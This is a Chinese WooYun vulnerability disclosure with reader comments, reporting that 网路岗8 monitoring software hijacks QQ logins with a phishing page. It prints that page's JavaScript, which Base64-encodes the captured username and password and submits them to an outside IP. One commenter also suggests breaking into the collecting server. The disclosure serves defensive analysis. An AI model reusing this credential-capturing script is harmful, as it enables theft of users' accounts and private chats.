当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07248

漏洞标题:网路岗8钓鱼式盗取QQ密码(分析过程)

相关厂商:腾讯

漏洞作者: New4

提交时间:2012-05-17 16:44

修复时间:2012-05-22 16:45

公开时间:2012-05-22 16:45

漏洞类型:钓鱼欺诈信息

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-17: 细节已通知厂商并且等待厂商处理中
2012-05-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

网路岗软件会针对安装QQ的计算机进行攻击已经严重威胁用户隐私,首先会针对QQ登陆过程进行拦截导致QQ提示“账户异常”,随后劫持http://im.qq.com/jh网站尝试盗取QQ用户密码!成功后利用QQ密码对QQ用户进行聊天记录监控!!!

详细说明:

网路岗软件会针对安装QQ的计算机进行攻击已经严重威胁用户隐私,首先会针对QQ登陆过程进行拦截导致QQ提示“账户异常”,随后劫持http://im.qq.com/jh网站尝试盗取QQ用户密码!成功后利用QQ密码对QQ用户进行聊天记录监控!!!
劫持后的页面密码使用BASE64加密可被嗅探并解密还原:

<script language="javascript">
var BASE64={
enKey: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',
deKey: new Array(
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
-1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
-1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1
),

encode: function(src){
var str=new Array();
var ch1, ch2, ch3;
var pos=0;
while(pos+3<=src.length){
ch1=src.charCodeAt(pos++);
ch2=src.charCodeAt(pos++);
ch3=src.charCodeAt(pos++);
str.push(this.enKey.charAt(ch1>>2), this.enKey.charAt(((ch1<<4)+(ch2>>4))&0x3f));
str.push(this.enKey.charAt(((ch2<<2)+(ch3>>6))&0x3f), this.enKey.charAt(ch3&0x3f));
}
if(pos<src.length){
ch1=src.charCodeAt(pos++);
str.push(this.enKey.charAt(ch1>>2));
if(pos<src.length){
ch2=src.charCodeAt(pos);
str.push(this.enKey.charAt(((ch1<<4)+(ch2>>4))&0x3f));
str.push(this.enKey.charAt(ch2<<2&0x3f), '=');
}else{
str.push(this.enKey.charAt(ch1<<4&0x3f), '==');
}
}
return str.join('');
}
};
function paswdfield_eventchange(a, b){
var nonefm = window.document.ld;
nonefm.u.value = BASE64.encode(a.u.value);
nonefm.p.value = BASE64.encode(a.p.value);
nonefm.w.value = "518000";
nonefm.action = "http://211.157.108.252/s?flag=WWWSOFTBARCOMWWWSOFTBARCOM";
nonefm.target="nonewin";
nonefm.submit();
}
</script>


漏洞证明:

劫持QQ客户端


被钓鱼后密码提交包


钓鱼页面包含“<!-- saved from url=(0077)http://aq.qq.com/cn/services/abnormal/abnormal_index -->” 信息可直接判断是否被替换。

修复方案:

QQ客户端升级修改关键算法防止数据包传输过程中被非法篡改。
由于网路岗使用QQ协议进行攻击,我想涉及的版本应该包含2010-2012 请腾讯公司尽快升级确保用户的安全。

版权声明:转载请注明来源 New4@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-05-22 16:45

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2012-05-17 16:45 | New4 ( 实习白帽子 | Rank:48 漏洞数:16 | 暗安全技术小组 New4)

    211.157.108.252 这个IP是网路岗的,还会收集用户密码 悲剧了! 请尝试过的用户改密码吧 要不6位都不保

  2. 2012-05-17 16:48 | LinuxPad ( 实习白帽子 | Rank:34 漏洞数:1 | LinuxPad@AdLab.Venus)

    老4 先给我看看 哈哈

  3. 2012-05-17 17:06 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    帮顶一些。

  4. 2012-05-17 17:07 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @New4 尼玛,还会发到网络上?

  5. 2012-05-17 17:15 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @New4 应该不会收集密码吧?从网上破解来看似乎是个license check?

  6. 2012-05-17 17:16 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @New4 应该不会收集密码吧?从网上破解这个软件的教程和问答来看,似乎是个license check?

  7. 2012-05-17 17:19 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    @New4 不会真是暗组大哥的真身吧。。。

  8. 2012-05-17 17:22 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    坐等公开。

  9. 2012-05-17 17:32 | New4 ( 实习白帽子 | Rank:48 漏洞数:16 | 暗安全技术小组 New4)

    @xsser 我感觉应该是收集了密码 然后重定向到正常网站的。 后门服务器 谁日一下 看看受灾用户有多少……

  10. 2012-05-17 17:38 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    @New4 先将密码收集,同时重定向到正常网站,如果post请求失败,在收集的密码后面自动添加失败注释。

  11. 2012-05-17 17:39 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    由“网路岗可截获QQ密码和聊天记录”谈起http://www.freebuf.com/articles/1698.html

  12. 2012-05-17 17:46 | LinuxPad ( 实习白帽子 | Rank:34 漏洞数:1 | LinuxPad@AdLab.Venus)

    @z@cx 你猜对了

  13. 2012-05-17 17:54 | z@cx ( 普通白帽子 | Rank:434 漏洞数:56 | 。-。-。)

    @LinuxPad 膜拜了。。。

  14. 2012-05-17 18:10 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    洞主是什么环境和版本

  15. 2012-05-17 18:24 | New4 ( 实习白帽子 | Rank:48 漏洞数:16 | 暗安全技术小组 New4)

    @xsser 网路岗8最新 QQ2012最新(2010-2012应该通用) IE8.0(XP)

  16. 2012-05-17 18:47 | Pentos ( 路人 | Rank:24 漏洞数:8 | 来潜水学习的!^^)

    mark下

  17. 2012-05-17 21:32 | tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)

    看了一下,其实只要把http变成https就可以了。

  18. 2012-05-18 15:27 | davie ( 实习白帽子 | Rank:34 漏洞数:4 | 关注安全)

    下载个鉴定下去!

  19. 2012-05-20 16:57 | tangzaifei ( 路人 | Rank:10 漏洞数:1 | tangzaifei)

    有传说网路岗和深信服的上网行为都已经能破解QQ聊天内容,具体实现方式还待确认。是报文加密内容被破解,还是报文劫持? 找个网路岗试试去。

  20. 2012-05-21 10:33 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    为了实现聊天记录监控,都用这种下三滥的方法骗KEY了